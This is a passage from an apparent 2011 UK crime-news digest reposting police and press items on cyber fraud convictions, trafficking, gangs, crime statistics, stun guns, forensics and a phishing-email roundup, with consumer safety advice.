In one criminal operation, interrupted by British intelligence and crime agencies,1m stolen identities were being traded. The discovery this summer, by GCHQ and the Serious Organised Crime Agency, prevented £300m of debit and credit card fraud, according to Hague.

Organised crime networks were in an "arms race" trying to steal money and ideas, in which "new techniques are adopted every day". The government was putting £650m into preventing attacks over the next four years, and was already combating problems each hour or each day, Mr Hague said.

"It is vital that businesses work with the government to become aware of all the threats they face and work with us on their defences."

Governments did not and should not control the internet, said Mr Hague, but he hoped for a "common sense of what the acceptable norm of behaviour in cyberspace" ought to be. The "vast" benefits of the rise of the internet must be balanced with the risk, he said.

In May, the Guardian revealed how the UK was developing a cyber weapons programme to counter growing threats to national security. Mr Hague told a security conference in Munich in February that the Foreign Office had repelled a cyber-attack a month earlier from "a hostile state intelligence agency". Sources told the Guardian at the time that the attack was believed to be from Chinese intelligence agencies.

(9th November 2011)


 

MEN JAILED FOLLOWING £3m E-CRIME INVESTIGATION
(Courtesy of: Metropolitan Police, dated 2nd November 2011)
www.met.police.uk

The ring leaders of a major organised criminal network which siphoned nearly £3 million from the bank accounts of unsuspecting members of the public jailed this week following an investigation by the Met's Police Central E-Crime Unit (PCeU)

Ukrainian nationals Yuriy Konovalenko aka Pavel Klikov (3.7.82 - 29 ys), and Yevhen Kulibaba (18.3.78 - 33 ys), both of 9 Nevada Heights, Chingford Mount Road, Chingford, were each jailed for four years and eight months at Croydon Crown Court after previously pleading guilty to conspiracy to defraud.

This result is the culmination of a complex and protracted investigation by detectives from the Met's Police Central e-Crime Unit which has seen 13 people jailed for their part in a sophisticated international online fraud that attacked the heart of the UK banking industry.

The investigation, codenamed Operation Lath, focussed on the activities of a group responsible for conducting a systematic and highly sophisticated banking fraud which attacked the banking accounts of hundreds of online customers.

The fraud was perpetrated through the use of banking 'Trojans' to infect the personal computers of bank account holders and subsequently secure funds from them. The malicious software programme was able to capture confidential information, such as usernames, passwords and account numbers.

These details were then used to access those accounts without the knowledge of the owners. Funds were then transferred to a large number of receiving accounts controlled by the group.

Kulibaba was the principal within this group of conspirators. He was based in the Ukraine and was responsible for obtaining and allocating accounts to be attacked, and organising the UK based conspirators to set up and operate recipient accounts and remove funds from them.

Konovolenko was Kulibaba's right hand man in the UK. He had a co-ordinating role, organising the establishment and operation of recipient accounts and instructing those with responsibility for organising the removal of the money out of the recipient accounts.

During the investigation the PCeU worked closely with UK banks and colleagues from the Crown Prosecution Service, the FBI and the US Department of Justice.

On 29 September 2011, 20 individuals were arrested at addresses in London and the Home Counties. During house searches, computers, mobile telephones, false passports, banking documents and other exhibits were seized and later examined.

Further arrests were made and additional inquiries were conducted jointly with investigators from Her Majesties Revenue and Customs (HMRC).

The total amount stolen through the operation of the fraud has not been definitively established; however the UK prosecution looked at the activities of the 13 defendants between September 2009 and March 2010 and during this period the proved loss was at least £2,884,590. The total amount which the conspirators attempted to remove was at least £4,286,559.

Det Insp Colin Wetherill, from the Metropolitan Police Central eCrime Unit said: "These defendants were part of an organised network of computer criminals operating a state-of-the art international online banking fraud, through which they stole many millions of pounds from individuals and businesses in the UK and United States.

"The investigation involved unprecedented levels of cooperation between the Metropolitan Police, the UK banks, the FBI and other UK and international law enforcement agencies. We are working hard to reduce the harm caused by these activities, to put fear into the minds of those contemplating these conspiracies and to bring such offenders to justice."

There are several steps individuals and institutions can take in order to minimise the likelihood of their computers becoming infected with malware:

- Frequently check your operating system is up-to-date to ensure your software has the latest fixes for new viruses, worms, and Trojan horses. Security 'patches' are usually free and can be downloaded from the software vendors.

- Run anti-virus and anti-spyware software - always run these softwares and keep them regularly updated.

- Make sure your anti-virus programme has the capability to scan e-mail and files as they are downloaded from the Internet.

- Run full disk scans periodically, which will help prevent malicious programmes from reaching your computer.

- Use a personal firewall , a full firewall can protect your computer from unauthorised access when configured correctly.

- Disconnect your computer from the Internet when you are not using it.

- Avoid opening attachments or following links in emails and on websites.

- Do thorough research before downloading any new, unknown software.

- Comprehensive advice can be found at www.getsafeonline.com

(9th November 2011)


 

CABIN CREW PIONEER NEW ANTI-TRAFFICKING INITIATIVE
(UK Home Office, dated 18th October 2011)
www.homeoffice.gov.uk

Immigration Minister Damian Green has hailed a new initiative to help cabin crew spot signs of human trafficking.

Virgin Atlantic is providing its cabin crew with special training to identify those who may be engaged in trafficking, their potential victims and how to report them to authorities before they arrive in the UK.

It is the first time an airline has worked with the UK Border Agency on training for cabin crew - a goal set out in the government's Human Trafficking Strategy published in July.

Human Trafficking Strategy

Immigration Minister Damian Green said: 'We have already made significant progress on the commitments we made in our Human Trafficking Strategy to do more to tackle this issue and this initiative provides us with another powerful tool to help combat it.

'I am delighted that Virgin Atlantic is leading the way in providing this training for staff and I would strongly encourage other airlines to step up and join the fight.'

E-learning and 24-hour helpline

The Virgin pilot project includes an e-learning package that raises awareness among staff about the issues surrounding human trafficking and details the indicators to look out for during a flight.

Cabin crew, who are in a prime position to identify both victims and traffickers, will have access to a 24-hour helpline to report concerns to the UK Border Agency.  This will ensure that officers can meet the flight and question the individual concerned allowing law enforcement agencies to take action against traffickers and provide support to the victims of trafficking.

UK Human Trafficking Strategy :

www.homeoffice.gov.uk/crime/human-trafficking-strategy/

(9th November 2011)


 

NEW GANGS TASK FORCE FORMED
(West Midlands Police, dated 20th October 2011)
www.west-midlands.police.uk

West Midlands Police is establishing a new task force in its continued bid to tackle urban street gangs across the whole force.

The dedicated team of 25 officers will be set up to tackle the 42 urban street gangs in the West Midlands area that exist with over 400 people affiliated to these gangs. Traditionally, the force has concentrated on only a relatively small number of geographic areas including central Birmingham, Wolverhampton, Sandwell and Coventry. The task force will pull together all these areas and any others where gangs are identified.

Since 2003, the force focussed a multi-agency partnership approach to address the gang issue by beginning to divert young people away from gang culture through early intervention and schools-based initiatives. Main strands of work have also concentrated on enforcement, managing offenders linked to gang-related criminality and using mediation as a tactic in diffusing tensions amongst opposing gangs.

As a result of this work, projects have been carried out such as Young Men at Risk which has provided support for vulnerable men aged 16 to 26 who have decided to exit the gun and gang culture and the 'My Life My Choice' DVD which is used as an educational resource to help teachers address the difficult issues of gangs.

The force has seen some success over recent years - the number of firearm-related offences drop from over 1,200 per year from 2004 to 2007 to 900 offences per year over the last three years.

A number of operations have been conducted over the last few years resulting in large seizures of class A drugs, cash and firearms as well as numerous successful convictions against dangerous offenders.

Acting Det Supt Jo Chilton, Head of the Gangs and Organised Crime Unit in Force CID, said: "West Midlands Police is committed to tackling gang-related criminality as well as reducing the number of young people becoming involved in gang culture and carrying weapons. "We continue to see the issue of tackling gangs as intrinsic to policing many of our areas which is why we are re-investing resources into this area so we can better support front line officers.

"We will continue to raise awareness about the risks involved of carrying a knife or firearm as many youngsters are not aware of the consequences of carrying a weapon.

"Any involvement in gun crime can bring a minimum five year custodial sentence, even if the person is not using the gun. This should be a powerful deterrent for anyone thinking of walking out with a weapon - it can have devastating consequences not only for the victim, their family and the offender's family.

"We want to be able to divert youngsters away from getting involved with gang activity by giving them something positive to concentrate on and to give people involved in gangs the opportunity to break away and make a fresh start."

Click the link to read the Tackling Gangs Booklet :

www.west-midlands.police.uk/latest-news/docs/Tackling-Gangs-Booklet.pdf

(9th November 2011)


 

UK CRIME FIGURES FALL HAS HALTED
(Guardian, dated 20th October 2011 author Alan Travis)
www.guardian.co.uk  [Note 1]

The remarkable 16-year fall in overall crime in England and Wales appears to have been halted by the impact of cuts and rising unemployment, with an apparent 10 per cent rise in household burglary.

Overall crime levels appear to have remained flat or started to nudge up with the latest British Crime Survey (BCS) showing a 2 per cent rise and police recorded crime figures a 4 per cent fall over the 12 months to this June.

The quarterly crime figures, which cover the 12 months to the second quarter between April and June this year, do not include this summer's riots. But they also show a 13 per cent rise in "other household theft", which covers thefts from gardens and sheds, the apparent 10 per cent rise in burglary according to the BCS and a 3 per cent rise in robbery and a 2 per cent rise in the most serious sexual offences on police figures.

The police figures, however, show continuing falls in most other categories of crime including a 12 per cent drop in criminal damage, 8 per cent falls in both violence against the person and car crime, and a 3 per cent fall in domestic burglary. All categories of BCS crime rose except for vandalism, which dropped by 9 per cent.

Home Office statisticians were very cautious about the figures, saying that taken together the two measures - BCS and police figures - show crime to have been stable in the 12 months to June with no statistically significant change in the crime rate.

The Home Office said the apparently alarming 10 per cent rise in burglary on the BCS was not statistically significant and comes alongside a 3 per cent fall in police recorded burglaries. "The latest figures suggest it is still too early to be confident there has been a real change in the medium-term trend for BCS burglary, which has been relatively stable since 2004/05," says the crime figures bulletin.

However, the statisticians say there is evidence of increases in lower-level offences such as pickpocketing, shoplifting and theft of unattended property. Police recorded "other theft" rose by 5 per cent and BCS "other household thefts" are up 13 per cent.

The 2 per cent rise in serious sexual offences follows increases in reporting and recording such crime since 2009, but this rate of increase seems to be slowing.

Provisional statistics show that gun crime fell by 16 per cent on the police figures.

Public confidence in the ability of the police and local council to deal with antisocial behaviour in their area rose from 52 per cent to 54 per cent.

Jon Murphy, the Association of Chief Police Officers lead on crime, said the alarming increase in robberies at knifepoint was partly driven by demand for mobile phones to be sold abroad at double their value.

"While there were falls in most police recorded crime and particularly in violence against the person, the increase in robbery and robbery with knives is a cause for concern.

"We believe this is in part driven by demand for mobile phone handsets, which can fetch more than double their worth on the black market abroad," he said.

"Worryingly, a large proportion of phone owners still do not have passcodes on their phones, leaving them vulnerable to possible ID theft and fraud. Phone owners are encouraged to set passcodes and look into anti-crime phone functions such as remote wipe technology.

"Police forces will want to focus actions to combat these offences and offer crime prevention advice."

(9th November 2011)


 

POLICE SMASH VEHICLE RINGING GANG
(Police Oracle,dated 18th October 2011 author Cliff Caswell)
www.policeoracle.com  [Note 1]

Metropolitan Police detectives have spoken of their satisfaction after two operations secured the convictions of six men responsible for stealing and selling luxury vehicles.

Officers from the Stolen Vehicle Unit moved to tackle the theft, ringing and resale of the high value cars following burglaries throughout London and south-east England.

And their efforts in Operations Elmendorf and Loden paid off - with the six defendants jailed for 17 years and some 70 cars recovered before they could be sold on.

Southwark Crown Court was told that the identities of stolen vehicles were altered before - in some instances - being sold on to unsuspecting customers.

Officers seized fraudulently obtained logbooks and registration forms for use in car ringing plus cash and documents relating to the advertisement of stolen cars.

A/DCI Paul Fuller, from the Stolen Vehicle Unit said the success of both operations had been down to "meticulous and painstaking work" of detectives and police staff.

He added: "The defendants caused considerable distress - not only those whose homes were invaded while they slept upstairs but also the individuals who innocently purchased a stolen, rung vehicle only to later have it seized by the police and find themselves out of pocket by thousands of pounds.

"The unit will continue to relentlessly identify and target organised criminal networks that steal and seek to dispose of stolen vehicles, and will use all means to secure the evidence to convict them and dismantle their criminal lifestyles."

IMPORTANT NOTE : Even when at home, ensure that your car keys are kept out of sight of unwanted visiters !

(9th November 2011)



CROSS-BORDER CRIME EFFORTS TIGHTENED
(Kent Police, dated 12th October)
www.kent.police.uk

 

The Chief Constable of Kent travelled to France last week to sign a new co-operation agreement with the most senior French Government official for the Northern French region of Pas-de-Calais, Monsieur Pierre de Bousquet.

The meeting was to extend an existing joint initiative between the two forces who work together to deal with cross border criminality and ensure the Channel is not used to evade justice or spirit away the ill-gotten gains of a criminal lifestyle.

The Chief Constable, Ian Learmonth, said: "Kent is the Gateway to Europe. We have around 30 million people pass through the County each year, with that number inceasingly substantially during 2012 thanks to the Olympic and Paralympic Games".

"Anyone thinking of coming to Kent to commit crime, or trying to export stolen goods to Europe or contraband into the UK needs to think again. We share a close working relationship - and more information than ever - with our French counterparts to deal with criminals.

"We are constantly tightening our efforts to further reduce cross border criminality with France, as well as Belgium and the Netherlands."

Trans-frontier crime is pursued vigorously by Kent Police, working in partnership with police forces from other countries and UK partners, such as the UK Borders Agency (UKBA).

Specifically targeted is counter-terrorism, drug supply, people trafficking and illegal immigration. Kent Police seizes more of the proceeds of crime than any other UK police force, bar London's Metropolitan.

Due to the close working with the French Gendarmerie and UKBA, Kent Police confiscated, under the Proceeds of Crime Act, the sum of 22,700 euros on 8 March 2011 from Jonathan Lui.

The money, was found in Lui's vehicle, a BMW car, when he was at the Channel Tunnel, Folkestone, travelling to France. Lui provided a UK address in High Wycombe and a rental address in France.

Folkestone Magistrates' Court found that the cash was not lawfully owned by Lui and that it was intended for unlawful conduct. The forfeiture was not contested and the cash seized therefore was forfeited.

Another example is the forfeiture of seized cash under the Proceeds of Crime Act from a couple at Dover Eastern Docks. A couple, originally from Somalia were subject to an outstanding European arrest warrant in relation to the abduction and/or kidnap of a young boy from the Dutch Local Authorities. This child had been with foster carers in Holland.

Officers from Kent Police intercepted the vehicle with the three inside on 19 May 2010. A search of the vehicle and belongings identified a cash sum of over 10,000 euros, which was seized under POCA. The couple were handed to the Dutch Authorities to be subject of court proceedings. The boy was returned to his Dutch foster parents. The money was made subject of a forfeiture order under POCA by Folkestone Magistrates Court.

The joint initiative with the Gendarmerie Nationale from Pas-de-Calais has also seen regular operational visits which means Kent officers patrol alongside French officers on both sides of the channel and work together on tackling drugs, counter-terrorism and immigration crime.

(9th November 2011)


 

JOINING FORCES TO FIGHT FRAUD
(City of London Police, dated 13th October 2011)
www.cityoflondon.police.uk

A new strategy that aims to reduce fraud - a crime that affects everyone and is estimated to cost the UK £38 billion every year.

It is the first time that the government, industry representatives, voluntary groups and law enforcement agencies have joined together on such a large scale to sign a joint commitment to tackle fraud.

All thirty-seven partners that have signed up to Fighting Fraud Together will contribute to and be accountable for its success. They are intent on expanding and extending the successful activities that exist in their sectors and sharing fraud intelligence across boundaries to prevent and disrupt the activities of fraudsters.

Fighting Fraud Together and its accompanying action plan place strong emphasis on preventing fraud through greater fraud awareness and self protection, combined with stronger government and industry prevention systems and controls. It also sets out a more effective approach to enforcement.

Examples of the new initiatives that are being progressed under Fighting Fraud Together include:

Preventing fraud

Industry and the public sector will develop their intelligence-sharing capabilities to prevent fraud attacks.

Increasing awareness and reporting

A new research tool will help all sectors provide more targeted prevention advice to the public, particularly vulnerable people, and develop a better understanding of small businesses' vulnerability to fraud and the support they need. Action Fraud will expand its fraud report taking capacity to include all financially motivated online crime.

A more effective enforcement response

Greater intelligence capabilities of the National Fraud Intelligence Bureau will disrupt fraudsters' activities and rapidly close down the channels through which they operate and launder money. Increasing the use of the civil system will bring more fraudsters to justice and there will be more redress for their victims.

Fighting Fraud Together is an active commitment that will continue to evolve. The aim of all who have signed up is to encourage many more industries and organisations to sign up and become involved in the coming year.

Speaking at the Fighting Fraud Together launch event, today at Mansion House, James Brokenshire MP, Minister for Crime and Security said:

"I applaud the different organisations and industry groups that have joined together today to play their own part in Fighting Fraud Together. By sharing what we know, we will reduce fraud.

"Fraud causes serious harm to the public, to businesses and the wider economy. For too long fraud has almost been seen as a victimless crime. It isn't and too often the victims are some of the most vulnerable members of our community. That's why this new strategy is important to better target, prosecute and prevent it.

"The creation of a new Economic Crime Command as part of the National Crime Agency will also provide a more effective, better co-ordinated and intelligence-led response across all economic crime fighting agencies."

The National Fraud Authority led the development of Fighting Fraud Together on behalf of the whole counter fraud community, with significant input from the private and not-for-profit sector as well as law enforcement and government.

National Fraud Authority Chief Executive, Stephen Harrison, commented: "Fraudsters can be beaten. We have seen reductions in fraud in some sectors in recent years but overall the threat is still growing. Fighting Fraud Together provides the means for all sectors of the economy to learn from each other and collaborate.

"As a result of Fighting Fraud Together I expect to see more sharing of intelligence, more fraud losses prevented, a greater number of criminal enterprises disrupted, more assets denied and more criminals brought to justice. We have the tools to fight back. Now we have the will and commitment to use them together to even greater effect."

Adrian Leppard, Commissioner of the City of London Police, which is the UK's lead force for fraud, said: "The nature and scale of fraud offending across the UK demands a co-ordinated and collaborative response from law enforcement and the public, private and voluntary sector.

"Through Fighting Fraud Together we have a comprehensive strategy in place that will enable the counter fraud community to combat more effectively a crime that has permeated all corners of society.

"As the national lead force for fraud and the home of the National Fraud Intelligence Bureau, the City of London Police specialises in sharing intelligence and best practice and will utilise all its resources in support of the Fighting Fraud Together strategy, which we believe marks an important milestone in our collective efforts to combat fraud."

For more information please contact: The National Fraud Authority on 0203 356 1035

(9th November 2011)


 

STUN GUNS : CRIMINALS NEW WEAPON OF CHOICE
(Sky News, dated 13th October 2011 author Mark White)
http://news.sky.com  [Note 1]

Criminals are increasingly choosing illegally-acquired stun guns as their weapon of choice, a Sky News investigation has revealed.

The devices are sold openly on market stalls in the Far East - and some appear to be smuggled into the UK.

Assistant Chief Constable Sue Fish, of the Association of Chief Police Officers (ACPO), said there was anecdotal evidence that some criminals may be turning to stun guns in the belief they might escape a jail term if caught.

She said: "I think our concern is that we could see an increase around the use of stun guns, because there does seem to be a misguided perception that they are seen as less serious than conventional firearms, when in fact the law views them exactly the same as an illegal gun."

ACPO is to embark on a detailed study of stun gun use by criminals, but at present there are no national statistics on the numbers of such weapons seized by the authorities.

England's four biggest police forces, who do record stun gun seizures, have recovered around 900 of them since 2008.

Last year, the number of crimes which involved the use of a stun gun in England and Wales stood at 128, an increase of 33% but still only a tiny proportion of overall firearms offences.

However, many crimes involving stun guns may go unreported. There is evidence drug dealers are using the weapons as an enforcement tool and many of their victims - habitual drug users - are reluctant to report their attackers.

Although touted as a weapon of self defence, they are terrifying and potentially deadly in the hands of criminals.

Staff at the West Midlands Air Ambulance charity near Birmingham have faced that horror.

They were recently robbed by masked men carrying stun guns who broke into their head office. They were tied up, held hostage and threatened for almost an hour before the raiders escaped with £12,000.

One of the charity's managers Jason Levy said: "There were around five or 10 people that were here for a meeting that day and they rounded a number of people up and we were pretty much held hostage here.

"We were put to the floor and at that point we realised there was a Taser gun. We were all pretty calm but pretty concerned about what was happening and what would happen next."

No-one has yet been arrested in connection with that robbery.

The vast majority of illegally-held stun guns in the UK have been bought overseas.

Asst Ch Con Fish said: "The main source for stun guns is from websites and illegally importing them into this country is a significant criminal offence for the importation as well as the subsequent possession.

"There are two clear criminal offences there. The other way that we are also seeing some weapons being brought in is by people literally bringing them in when they've travelled abroad and purchased them and then, either coming in by air, or by vehicle across our borders."

On a market stall in central Bangkok, they were only too happy to demonstrate for Sky News an array of dangerous weapons, including numerous stun guns.

We were able to buy one for around £15. It was disguised to look like a mobile phone, but the ring tone on this phone came with a 50,000 volt electric shock.

The weapon was disposed of a short time later. However, many are being smuggled into the UK, it seems.

The most recent figures from HM Revenue and Customs estimated around 1,000 such weapons a year are recovered at UK ports and airports.

Keith Vaz, chairman of the Commons' Home Affairs Select Committee, said: "One of the things we've got now is a border police force and therefore it is vital that there is proper monitoring and surveillance of what comes into the country.

"When it concerns a weapon of this kind, that has the potential to kill as well as to stun, it is important that we find out exactly how it's getting in... who's able to order this over the internet... and how we can stop it happening."

Devon and Cornwall police seized 60 mobile phone-type stun guns in two separate operations recently. Detectives believe the weapons originated in the Far East.

They were the exact same type as those we were able to buy legally

(9th November 2011)


 

MET HIRES 180 FORENSIC SCIENTISTS
(Guadian, dated 10th October 2011)
www.guardian.com  [Note 1]

Note : This article maybe the copyright of a publication other that the Guardian newspaper.
Scotland Yard is hiring 180 scientists from the soon to be defunct Forensic Science Service to bring its scenes of crime work inhouse - raising fears amongst criminal law experts that the independence and integrity of expert prosecution evidence could be jeopardised.

As a result of the government's closure of the FSS talks have been underway between the Metropolitan Police, the Home office and the scientists' union, Prospect, to move the scientists to the Met's own forensic laboratory which is being expanded to take on part of the work originally done by the FSS.

The minister for crime and security, James Brokenshire has signed off on the move but the scientists union is seeking assurances from Scotland Yard that the independence of its members will be protected.

"The Met will be using these scientists in a recovery and interpretive role in the field, at scenes of crime," said Steve Thomas, national officer for Prospect. "They know that there are concerns from the scientists around conflict of interests and it will be a cultural difference for the scientists. We are seeking assurances about the management and independence of the scientific work they are doing."

The move will see the pendulum swing back 30 years to the time when the Metropolitan Police forensic laboratory provided the expert evidence for detectives. But the Met lab was merged in 1996 with the new Forensic Science Service to create a national forensic facility independent of the police - partly because of concerns over the independence of scientists working within the police.

Criminal lawyer Simon McKay said he felt a "considerable sense of unease" at the news. "The whole evolution of expert evidence over the last decade has been to continue to strive for experts to be able to demonstrate their independence and integrity in criminal jurisdictions. And this is completely regressive," he said.

"It was always going to be the natural consequence of closing down the FSS. Essentially these scientists are going to be working for the police."

McKay cited historic miscarriages of justice such as the Birmingham Six, the Guildford Four and the prosecution of Colin Stagg for the murder of Rachel Nickell, as examples of the dangers of scientific experts working too closely with the police. The MP Chris Mullin said in the Commons in the aftermath of the Birmingham Six case that Dr Frank Skuse, the forensic scientist whose evidence helped convict the Birmingham Six, "conspired with police officers to pervert the course of justice."

The Met's director of forensic services, Gary Pugh, told the science and technology committee earlier this year that the force needed to ensure continuity of provision, and as such would be expanding its own forensic capability in preparation for the closure of the FSS in March.

"To remove the FSS as a provider of forensic science services in twelve months will be an operational challenge of unprecedented magnitude," he said. "(It) leaves the need for capacity to undertake forensic examinations in around 300 suspicious death investigations, 1,500 rape and sexually motivated crime case and 1,500 crimes of serious violence while also picking up a large legacy of cases..

"The MPS is developing a new operating model where the recovery, interpretation and reporting of forensic evidence will be undertaken by the MPS and the DNA profiling and analytical science will be undertaken by commercial providers."

(9th November 2011)


 

OUTSTANDING RESULTS FOR FINGER TECHNOLOGY
(Police Oracle, dated 5th October 2011 author Cliff Caswell)
www.policeoracle.com  [Note 1]

A state-of-the art device that can digitally match up fingerprints in minutes has been making its mark with officers at the sharp end of policing.

The MobileID kit - which is run from a BlackBerry smartphone - has now seen some extensive use since it was first deployed earlier in the year.

And with the means to check a suspect's prints against the thousands on the National Fingerprint Database anywhere in the country, officers are reporting excellent results.

Sgt Simon Goss, of the Roads Policing Unit Proactive Team at Hampshire Constabulary said MobileID was an outstanding and highly versatile tool.

Sgt Goss told PoliceOracle.com: "We are getting some fantastic results with it - results that we would not have secured by using any other policing methods.

"We have now had this equipment for some time in Hampshire Constabulary and it has really proved its worth - you can rapidly establish identification."

Sgt Goss was speaking after the fingerprinting device - which was launched by the NPIA over the summer - played an instrumental role in allowing officers from Hampshire to identify an unconscious man in intensive care.

A hospital had contacted the Force after admitting the seriously ill patient, and an officer swiftly provided rapid confirmation who they were treating.

Identification of unconscious or fatal victims at a crime, accident scene or hospital has proved one of the key benefits that the MobileID service is delivering

An average saving of at least 30 minutes per case are among the other advantages.

The devices have now been deployed to more than half of forces in England and Wales this year, helping to cut the number of trips officers make back to the police station and giving them more time to spend out and about.

Nick Deyes, NPIA head of the Information Systems Improvement Strategy (ISIS) said: "This is a great example of how MobileID is not only an effective tool in the fight against crime, but also a piece of technology that can be used to help identify victims who have been seriously injured.

"This is a very promising start for a new service that is proving to be an asset."

DCC Peter Goodman, who is the ACPO spokesperson for the equipment, added: "The functionality that MobileID offers benefits to more than just the Police Service.

"As this example shows, the technology can also assist other agencies and the public. Over the coming months I expect to see more and more examples which highlight the advantages of using MobileID," he emphasised.

(9th November 2011)




MORE NEWS FROM MY SPAM INBOX- OCTOBER !
Category : phishing
 
My Internet Service Providers (ISP) spam filter appears to have again done a very good job this month. For the second month running I have only received one suspect "banking" e-mail. But there were two miscelaneous phishing e-mails.

 

- From "Natwest Personal Banking"; subject "Restore your Access Online". The text of this phishing e-mail states "Our records shows that your online banking session has been blocked due to the following reasons". You are then requested to click on a bogus link and provide all of your banking details.

- From IRS (USA inland revenue). The e-mail stated that I was due a tax refund; all I need do is provide all my banking details and tax reference numbers after clicking on a link.

- From UPS ( within the USA ). A parcel is awaiting delivery, but has incurred a customs charge. Click on link and provide credit or debit card details to pay for customs then parcel will be released.

These e mails are bogus and are just phishing for personal information. If you receive anything like them, delete immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within the bogus e-mails.

(28th October 2011)



TWO METROPOLITAN POLICE ASSISTANT COMMISSIONERS APPOINTED
(BBC News, dated 25th October 2011)
www.bbc.co.uk

 

The Metropolitan Police Authority (MPA) has appointed two new assistant commissioners at Scotland Yard.

Surrey Chief Constable Mark Rowley and Simon Byrne, Deputy Chief Constable at Greater Manchester Police, will take on the role for five years.

Met Police Commissioner Bernard Hogan-Howe said they would bring huge levels of operational experience.

They join Britain's largest police force which has more than 50,000 staff, including 32,000 officers.

They will be paid an annual starting salary of £181,455.

Mr Hogan-Howe said: "I am really pleased to be able to welcome them to the Met and know that their appointment will help the Met deliver our aim of world-class policing that Londoners can be proud of."

Kit Malthouse, chair of the MPA, said: "Both Mark and Simon excelled in interview and impressed the panel with their knowledge and experience.

"As assistant commissioners they will be expected to play a significant role within the Met, ensuring its officers make London a safer city for us all."

Interviews were conducted by a panel of MPA members, with the commissioner, Her Majesty's Inspector of Constabulary Sir Denis O'Connor and Catherine Crawford, MPA chief executive, acting as advisers to the panel.

Editors Note

Of the 32,000 Officers quoted in this article, only 19,000 are exclusively London operational officers. The remaining 12 - 13,000 officers work on other duties ( counter terrorism etc).

(26th October 2011)


 

A POLICE VISION

Based on extracts from the "History of the Metropolitan Police".

http://www.met.police.uk/history/crime_museum.htm

When people mention the history of the Police they always recall the name Robert Peel. He was the Home Secretary when the first Metropolitan Police Act was passed in 1829. Hence the polite police nicknames "Bobbies" and "Peelers". The people who were responsible for actually organising and designing the "New Police" had a lesser notoriety and they were Colonel Charles Rowan and Richard Mayne. It appears that Richard Mayne was given the responsibility of coming up with the Metropolitan Polices first vision statement. I wonder if he was paid the thousands of pounds that Public Relations and Marketing companies have charged the Met since for products that have been less meaningful and sucinct ?

In 1829 Sir Richard Mayne wrote:

"The primary object of an efficient police is the prevention of crime: the next that of detection and punishment of offenders if crime is committed. To these ends all the efforts of police must be directed. The protection of life and property, the preservation of public tranquillity, and the absence of crime, will alone prove whether those efforts have been successful and whether the objects for which the police were appointed have been attained."

Under the new regime I wonder what new Vision and Mission statements will look like; let alone its cost ?

(26th October 2011)


 

COMMISSIONERS LETTER TO LONDONERS
(13th October 2011)

This letter was distributed via the neighbourhoodlink service.

If you would like to register for this service please go to : www.neighbourhoodlink.met.police.uk

This is a free messaging service (via e-mail) that enables you to regularly receive information from the Metropolitan Police Service. The information will in relation to crime and safety in the areas you work and live.




New Scotland Yard
8 - 10 Broadway
London
SW1H 0BG
www.met.police.uk
Follow us on Twitter: @metpoliceuk

 

Dated : October 2011

Dear Londoners,

As the new Metropolitan Police Commissioner I felt it was important that I outlined to you what my priorities are and how we can work together to ensure that we make the Met the best police service in the world.

It is my intention to build on public trust in the Met and lead a service that criminals will fear, and you will be proud of.

As Commissioner, I have three simple aims: I want us to cut crime, cut costs, and continue to develop the culture of the organisation, and to do all that based on the simple but important values of humility, transparency and integrity.

I want us to do what I call Total Policing - that will mean preventing crime wherever we can, doing everything possible to target offenders when crime does happen, and ensuring that we properly look after victims.

You can help us make London safer. If you tell us information about people carrying weapons, acting suspiciously or who may have been involved in a crime, we will follow up on it. You can also use Crimestoppers on 0800 555111.

I want you to be able to hold me to account so in the first 100 days as Commissioner I want To:
1) Roll out more widely our programme to tackle gangs into 14 boroughs.
2) Lead a drive to seize uninsured vehicles, as we know that it is often criminals who fail to insure their cars.
3) Introduce a scheme whereby every month the whole of the Met will focus on tackling
one particular issue across all of London, such as people who jump bail or who are
committing traffic offences. By working together in this way we will be much more
effective.

I want you to be able to tell me what is working and what you want us to do better. I will becoming out to every area of London in the months ahead and would encourage you to come and talk to me so that we can keep improving our service to you. I'm very proud to be your Commissioner and I am very proud of the men and women in the Met. We are your police force and will be working every minute to keep you safe.

Yours sincerely

Bernard Hogan-Howe

Commissioner

(24th October 2011)


UNINSURED DRIVERS IN LONDON TARGETED BY MY CAMPAIGN
(BBC News, dated 19th October 2011)
www.bbc.co.uk

More than 500 cars have been seized and 66 people arrested so far in an operation targeting uninsured drivers in London.

The day-long operation, overseen by the Metropolitan Police Commissioner Bernard Hogan-Howe, is also designed to disrupt other criminal activity.

Up to 80% of uninsured drivers were involved in other crimes, he said.

Incidents of uninsured driving on Merseyside fell by 40% after Mr Hogan-Howe used the measure there.

"[Uninsured drivers] are also more likely to be involved in crashes and have unsafe cars, so we're taking this action to make London's roads safer," the commissioner added.

"This is the first of the operations I have asked for where officers across the Met will spend a dedicated day on a regular basis targeting uninsured drivers and those believed to be connected to crime."

Roadside checks
 
The arrests were made for crimes including possessing drugs or an offensive weapon, driving whilst disqualified and driving while wanted on an arrest warrant.

The operation, which involved 1,000 officers, also led to a stolen lorry being stopped in Horseferry Road, Westminster, central London, a few minutes after it was reported stolen.

Cannabis, a large bundle of cash and a lock knife were found when a car was searched in Harleyford Road, Kennington, south London.

Roadside checkpoints using automatic number plate recognition have been deployed.

Uninsured vehicles have been impounded and could be destroyed, while offenders will be prosecuted.

The penalty for driving a vehicle without insurance is six penalty points and a £200 fine and can lead to a driving ban.

According to the Motors Insurers' Bureau, uninsured drivers increase other motorists' annual insurance premiums by £30.

They are also said to be five times more likely to be involved in road collisions.

'Direct approach'
 
In 2010 Scotland Yard seized 34,000 vehicles and prosecuted thousands of people who had no car insurance.

Jenny Jones, a Green Party Assembly Member who has campaigned on the issue, said: "It's great to see the new Met Commissioner taking a direct approach to tackle the problem of illegal drivers.

"I want the commissioner to stick to his suggestion that London should be doing exactly what he achieved in Merseyside.

"We need to take nearly three times as many vehicles off the road as we do now."

She added: "If we really want to crack down on the problem, we're going to have to take almost 100,000 illegal vehicles off the road each year."

(24th October 2011)


 

POLICE LAUNCH AUTUMN CRIME CRACKDOWN
(Courtesy of Metropolitan Police, dated 17th October 2011)
www.met.police.uk

With Halloween and Bonfire Night around the corner, the Metropolitan Police Service (MPS) today, Monday 17 October, commences its seasonal crackdown on crime and anti-social behaviour.

With both these events approaching, the focus of the MPS will be on ensuring the safety of our communities throughout this period.

Commander Christine Jones, said: "We are here for London and to help make sure that everyone can enjoy the festivities and stay safe.

"All 32 London boroughs have a local plan in place, drawing together experience and successful tactics from previous years as well as managing planned events in their areas, focusing our resources in the right places and working closely and continually with our partners and communities.

